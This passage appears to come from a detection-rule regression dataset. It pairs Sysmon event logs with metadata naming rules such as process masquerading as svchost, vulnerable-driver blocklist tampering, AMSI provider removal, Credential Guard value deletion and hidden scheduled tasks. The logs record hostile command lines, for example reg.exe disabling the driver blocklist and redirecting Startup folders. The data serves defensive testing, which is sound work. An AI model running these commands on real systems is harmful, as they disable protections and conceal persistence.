    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2026-02-04T08:47:45.988926Z\"\n        }\n      },\n      \"EventRecordID\": 715337,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 776,\n          \"ThreadID\": 4344\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"srv-01.midgardnet.tech\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2026-02-04 08:47:45.987\",\n      \"ProcessGuid\": \"14207D89-07B1-6983-EA01-000000004402\",\n      \"ProcessId\": 5592,\n      \"Image\": \"C:\\\\Users\\\\SwachchhandaP\\\\Downloads\\\\svchost.exe\",\n      \"FileVersion\": \"10.0.20348.1 (WinBuild.160101.0800)\",\n      \"Description\": \"Windows Calculator\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"CALC.EXE\",\n      \"CommandLine\": \".\\\\svchost.exe\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\SwachchhandaP\\\\Downloads\\\\\",\n      \"User\": \"MIDGARDNET\\\\SwachchhandaP\",\n      \"LogonGuid\": \"14207D89-057C-6983-A047-0C0000000000\",\n      \"LogonId\": \"0xc47a0\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"Medium\",\n      \"Hashes\": \"MD5=1FD4DD58C75D6F2EDCDB337EE686231E,SHA256=4208893C871D2499F184E3F0F2554DA89F451FA9E98D95FC9516C5AE8F2B3BBD,IMPHASH=8EEAA9499666119D13B3F44ECD77A729\",\n      \"ParentProcessGuid\": \"14207D89-0781-6983-E201-000000004402\",\n      \"ParentProcessId\": 984,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"MIDGARDNET\\\\SwachchhandaP\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_svchost_masqueraded_execution/info.yml",
    "content": "id: 9cee7767-9219-40b3-b77e-dedf82957c94\ndescription: N/A\ndate: 2026-02-04\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: be58d2e2-06c8-4f58-b666-b99f6dc3b6cd\n      title: Suspicious Process Masquerading As SvcHost.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_svchost_masqueraded_execution/be58d2e2-06c8-4f58-b666-b99f6dc3b6cd.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_user_shell_folders_registry_modification/8f3ab69a-aa22-4943-aa58-e0a52fdf6818.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2026-01-05T06:59:26.079827Z\"\n        }\n      },\n      \"EventRecordID\": 75087,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3636,\n          \"ThreadID\": 4340\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2026-01-05 06:59:26.059\",\n      \"ProcessGuid\": \"0197231E-614E-695B-DC0C-000000000C00\",\n      \"ProcessId\": 11680,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\reg.exe\",\n      \"FileVersion\": \"10.0.26100.5074 (WinBuild.160101.0800)\",\n      \"Description\": \"Registry Console Tool\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"reg.exe\",\n      \"CommandLine\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\reg.exe\\\" add \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\" /v \\\"Common Startup\\\" /t REG_SZ /d C:\\\\Test\\\\calc.exe /f\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\xodih\\\\Downloads\\\\Sysmon\\\\\",\n      \"User\": \"swachchhanda\\\\xodih\",\n      \"LogonGuid\": \"0197231E-70FA-694F-AED1-150000000000\",\n      \"LogonId\": \"0x15d1ae\",\n      \"TerminalSessionId\": 1,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"MD5=CE3B3DCB08556285C0FC73B7CDC1601D,SHA256=08B28258C2225574FE6359286B5D23B19F07BD39CEE04B72ED5CF7A8B7FBF9F3,IMPHASH=8E5CDA80916A6EB4EC8151EC790ED9F0\",\n      \"ParentProcessGuid\": \"0197231E-7211-694F-D001-000000000C00\",\n      \"ParentProcessId\": 9524,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\n      \"ParentCommandLine\": \"powershell  -ep bypass\",\n      \"ParentUser\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_user_shell_folders_registry_modification/info.yml",
    "content": "id: 60dc10cf-d9d5-4e64-897f-90b9074def8f\ndescription: N/A\ndate: 2026-01-05\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: 8f3ab69a-aa22-4943-aa58-e0a52fdf6818\n      title: User Shell Folders Registry Modification via CommandLine\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_user_shell_folders_registry_modification/8f3ab69a-aa22-4943-aa58-e0a52fdf6818.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_vulnerable_driver_blocklist_registry_tampering/22154f0e-5132-4a54-aa78-cc62f6def531.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-12-23T02:16:46.810517Z\"\n        }\n      },\n      \"EventRecordID\": 90849,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3320,\n          \"ThreadID\": 4216\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-12-23 02:16:46.792\",\n      \"ProcessGuid\": \"0197231E-FB8E-6949-2610-000000000D00\",\n      \"ProcessId\": 25368,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\reg.exe\",\n      \"FileVersion\": \"10.0.26100.5074 (WinBuild.160101.0800)\",\n      \"Description\": \"Registry Console Tool\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"reg.exe\",\n      \"CommandLine\": \"reg  add \\\"HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\CI\\\\Config\\\" /v VulnerableDriverBlocklistEnable /t REG_DWORD /d 00000000 /f\",\n      \"CurrentDirectory\": \"C:\\\\Windows\\\\System32\\\\\",\n      \"User\": \"swachchhanda\\\\xodih\",\n      \"LogonGuid\": \"0197231E-5032-6940-AAE2-070000000000\",\n      \"LogonId\": \"0x7e2aa\",\n      \"TerminalSessionId\": 1,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"MD5=CE3B3DCB08556285C0FC73B7CDC1601D,SHA256=08B28258C2225574FE6359286B5D23B19F07BD39CEE04B72ED5CF7A8B7FBF9F3,IMPHASH=8E5CDA80916A6EB4EC8151EC790ED9F0\",\n      \"ParentProcessGuid\": \"0197231E-FB8C-6949-2310-000000000D00\",\n      \"ParentProcessId\": 22176,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_vulnerable_driver_blocklist_registry_tampering/info.yml",
    "content": "id: eca9f987-800a-4b32-92ec-2d50a0a120a0\ndescription: N/A\ndate: 2025-12-23\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: 22154f0e-5132-4a54-aa78-cc62f6def531\n      title: Vulnerable Driver Blocklist Registry Tampering Via CommandLine\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_vulnerable_driver_blocklist_registry_tampering/22154f0e-5132-4a54-aa78-cc62f6def531.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_werfaultsecure_abuse/1f0b4cac-9c81-41f4-95d0-8475ff46b3e2.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-11-27T08:12:45.186674Z\"\n        }\n      },\n      \"EventRecordID\": 733879,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3544,\n          \"ThreadID\": 4264\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-11-27 08:12:45.183\",\n      \"ProcessGuid\": \"0197231E-07FD-6928-2A0C-000000000D00\",\n      \"ProcessId\": 3532,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\",\n      \"FileVersion\": \"10.0.26100.7019 (WinBuild.160101.0800)\",\n      \"Description\": \"Windows Fault Reporting\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"WerFaultSecure.exe\",\n      \"CommandLine\": \"C:\\\\Windows\\\\System32\\\\WerFaultSecure.exe /h /pid 3472 /tid 3476 /encfile 304 /cancel 364 /type 268310\",\n      \"CurrentDirectory\": \"C:\\\\WINDOWS\",\n      \"User\": \"swachchhanda\\\\xodih\",\n      \"LogonGuid\": \"0197231E-B736-6923-B25C-3B0000000000\",\n      \"LogonId\": \"0x3b5cb2\",\n      \"TerminalSessionId\": 1,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=9521BDCD891789724786BDCB9C9468A06818EDDC,MD5=C5A2014C3BC84EDCEEF5185AEA3BB5E0,SHA256=1C60BA5771201F7AEE44DCA30CBCBF78F6E3C39F30AD0A5C6C7BC8137A475EAA,IMPHASH=79E7A5E4F18B29329345D2098E1B95EB\",\n      \"ParentProcessGuid\": \"0197231E-07FD-6928-290C-000000000D00\",\n      \"ParentProcessId\": 9388,\n      \"ParentImage\": \"C:\\\\Users\\\\xodih\\\\Downloads\\\\EDRFreeze-gnu.exe\",\n      \"ParentCommandLine\": \"EDRFreeze-gnu.exe  3472 10000\",\n      \"ParentUser\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_werfaultsecure_abuse/info.yml",
    "content": "id: 68010a5c-f8bf-4a2c-8cd0-038d4009805e\ndescription: N/A\ndate: 2025-11-27\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: 1f0b4cac-9c81-41f4-95d0-8475ff46b3e2\n      title: PPL Tampering Via WerFaultSecure\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      path: regression_data/rules/windows/process_creation/proc_creation_win_werfaultsecure_abuse/1f0b4cac-9c81-41f4-95d0-8475ff46b3e2.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_delete/registry_delete_disable_credential_guard/d645ef86-2396-48a1-a2b6-b629ca3f57ff.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 12,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 12,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-12-26T19:24:05.918776Z\"\n        }\n      },\n      \"EventRecordID\": 18298,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3484,\n          \"ThreadID\": 3424\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"DeleteValue\",\n      \"UtcTime\": \"2025-12-26 19:24:05.918\",\n      \"ProcessGuid\": \"0197231E-E0D5-694E-3803-000000000A00\",\n      \"ProcessId\": 11088,\n      \"Image\": \"C:\\\\WINDOWS\\\\system32\\\\reg.exe\",\n      \"TargetObject\": \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\DeviceGuard\\\\RequirePlatformSecurityFeatures\",\n      \"User\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_delete/registry_delete_disable_credential_guard/info.yml",
    "content": "id: 2e3725ae-2eaa-48a2-9d9b-4a7d55a75974\ndescription: N/A\ndate: 2025-12-26\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: d645ef86-2396-48a1-a2b6-b629ca3f57ff\n      title: Windows Credential Guard Related Registry Value Deleted - Registry\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_delete/registry_delete_disable_credential_guard/d645ef86-2396-48a1-a2b6-b629ca3f57ff.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key/41d1058a-aea7-4952-9293-29eaaf516465.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 12,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 12,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-26T00:11:12.880834Z\"\n        }\n      },\n      \"EventRecordID\": 16786799,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"DeleteKey\",\n      \"UtcTime\": \"2025-10-26 00:11:12.865\",\n      \"ProcessGuid\": \"5AA13A44-6720-68FD-3E3F-000000004002\",\n      \"ProcessId\": 6016,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\n      \"TargetObject\": \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\AMSI\\\\Providers\\\\{2781761E-28E0-4109-99FE-B9D127C57AFE}\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key/info.yml",
    "content": "id: 1d4c1ea3-3215-451d-bde8-b64ca8e56041\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 41d1058a-aea7-4952-9293-29eaaf516465\n      title: Removal Of AMSI Provider Registry Keys\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key/41d1058a-aea7-4952-9293-29eaaf516465.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_delete/registry_delete_runmru/3a9b8c1e-5b2e-4f7a-9d1c-2a7f3b6e1c55.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 12,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 12,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-24T23:56:57.832430Z\"\n        }\n      },\n      \"EventRecordID\": 111828,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"DeleteKey\",\n      \"UtcTime\": \"2025-10-24 23:56:57.828\",\n      \"ProcessGuid\": \"5AA13A44-1246-68FC-781E-000000004002\",\n      \"ProcessId\": 9880,\n      \"Image\": \"C:\\\\Windows\\\\system32\\\\reg.exe\",\n      \"TargetObject\": \"HKU\\\\S-1-5-21-3960063115-309473240-3247002503-500\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\RunMRU\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_delete/registry_delete_runmru/info.yml",
    "content": "id: 3c0a5ddd-6241-4b52-9718-b12920e082ef\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 3a9b8c1e-5b2e-4f7a-9d1c-2a7f3b6e1c55\n      title: RunMRU Registry Key Deletion - Registry\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_delete/registry_delete_runmru/3a9b8c1e-5b2e-4f7a-9d1c-2a7f3b6e1c55.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal/526cc8bc-1cdc-48ad-8b26-f19bff969cec.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 12,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 12,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T00:01:59.334619Z\"\n        }\n      },\n      \"EventRecordID\": 156421,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"DeleteValue\",\n      \"UtcTime\": \"2025-10-25 00:01:59.330\",\n      \"ProcessGuid\": \"5AA13A44-1377-68FC-A61E-000000004002\",\n      \"ProcessId\": 5160,\n      \"Image\": \"C:\\\\Windows\\\\system32\\\\reg.exe\",\n      \"TargetObject\": \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\MaliciousTask\\\\Index\",\n      \"User\": \"NT AUTHORITY\\\\SYSTEM\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal/info.yml",
    "content": "id: f3670cef-9f21-4a86-901b-c28c285f3b52\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 526cc8bc-1cdc-48ad-8b26-f19bff969cec\n      title: Removal Of Index Value to Hide Schedule Task - Registry\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal/526cc8bc-1cdc-48ad-8b26-f19bff969cec.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal/acd74772-5f88-45c7-956b-6a7b36c294d2.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 12,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 12,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T00:01:54.872810Z\"\n        }\n      },\n      \"EventRecordID\": 155709,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"DeleteValue\",\n      \"UtcTime\": \"2025-10-25 00:01:54.861\",\n      \"ProcessGuid\": \"5AA13A44-1372-68FC-A51E-000000004002\",\n      \"ProcessId\": 7008,\n      \"Image\": \"C:\\\\Windows\\\\system32\\\\reg.exe\",\n      \"TargetObject\": \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\MaliciousTask\\\\SD\",\n      \"User\": \"NT AUTHORITY\\\\SYSTEM\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal/info.yml",
    "content": "id: b796fd1e-a03a-4db8-a072-c597b6e0da1b\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: acd74772-5f88-45c7-956b-6a7b36c294d2\n      title: Removal Of SD Value to Hide Schedule Task - Registry\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal/acd74772-5f88-45c7-956b-6a7b36c294d2.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_event/registry_event_add_local_hidden_user/460479f3-80b7-42da-9c43-2cc1d54dbccd.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 13,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 13,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2020-12-18T17:56:07.017817Z\"\n        }\n      },\n      \"EventRecordID\": 596571,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3552,\n          \"ThreadID\": 5004\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"MSEDGEWIN10\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"Hidden Local Account Created\",\n      \"EventType\": \"SetValue\",\n      \"UtcTime\": \"2020-12-18 17:56:07.015\",\n      \"ProcessGuid\": \"747F3D96-68DD-5FDD-0000-00101B660000\",\n      \"ProcessId\": 648,\n      \"Image\": \"C:\\\\Windows\\\\system32\\\\lsass.exe\",\n      \"TargetObject\": \"HKLM\\\\SAM\\\\SAM\\\\Domains\\\\Account\\\\Users\\\\Names\\\\hideme0007$\\\\(Default)\",\n      \"Details\": \"Binary Data\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_event/registry_event_add_local_hidden_user/info.yml",
    "content": "id: 1c45847c-0ccb-43f5-aa06-ad97d1553d5a\ndescription: N/A\ndate: 2025-10-31\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 460479f3-80b7-42da-9c43-2cc1d54dbccd\n      title: Creation of a Local Hidden User Account by Registry\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_event/registry_event_add_local_hidden_user/460479f3-80b7-42da-9c43-2cc1d54dbccd.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode/1547e27c-3974-43e2-a7d7-7f484fb928ec.json",
